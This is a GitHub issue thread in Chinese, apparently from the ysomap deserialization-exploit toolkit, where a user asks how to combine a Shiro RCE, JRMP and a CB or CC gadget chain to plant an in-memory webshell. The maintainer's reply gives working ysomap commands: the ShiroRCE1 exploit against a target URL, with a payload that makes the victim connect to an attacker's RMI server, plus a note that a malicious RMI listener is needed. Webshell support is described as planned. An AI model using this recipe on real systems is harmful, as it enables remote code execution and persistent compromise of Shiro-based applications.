请问一下:如果我想用shiro+JRMP+cb链或者cc链+注入一个内存马 #16

sv3nbeast · 2021-06-17T09:54:18Z

应该怎么操作呢。
一阵子有点想不过来0.0

wh1t3p1g · 2021-06-17T13:11:27Z

当前的shiro rce还有点问题，我最近再改改，具体的使用可以看https://github.com/wh1t3p1g/ysomap/blob/master/scripts/shiro_rce.yso，
跟问题 #15 差不多，到时候，我写一点介绍，您可以先看这个脚本。

wh1t3p1g · 2021-06-26T06:09:16Z

你好，
关于你提的问题：

shiro+jrmp

use exploit ShiroRCE1
set target http://localhost:8080/
set requestMethod GET
use payload RMIConnectWithUnicastRemoteObject
use bullet RMIConnectBullet
set rhost rmi_server_ip
set rport rmi_server_port
run

另外需要建立一个RMI的恶意服务，如RMIListener或RMIRefListener
此处的话，其实不需要依赖cb或cc

关于注入内存马的问题
当前关于内存马的支持，将在下个版本中更新支持(暂时有的tomcatEcho不适合应用于shiro)。
预计采用形式为exploit(ShiroRCE1) payload(cb1) bullet(TemplatesImplBullet)

sv3nbeast · 2021-06-28T03:49:40Z

欧克，感谢

sv3nbeast closed this as completed Jun 28, 2021

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

请问一下:如果我想用shiro+JRMP+cb链或者cc链+注入一个内存马 #16

请问一下:如果我想用shiro+JRMP+cb链或者cc链+注入一个内存马 #16

sv3nbeast commented Jun 17, 2021

wh1t3p1g commented Jun 17, 2021

wh1t3p1g commented Jun 26, 2021

sv3nbeast commented Jun 28, 2021

请问一下:如果我想用shiro+JRMP+cb链或者cc链+注入一个内存马 #16

请问一下:如果我想用shiro+JRMP+cb链或者cc链+注入一个内存马 #16

Comments

sv3nbeast commented Jun 17, 2021

wh1t3p1g commented Jun 17, 2021

wh1t3p1g commented Jun 26, 2021

sv3nbeast commented Jun 28, 2021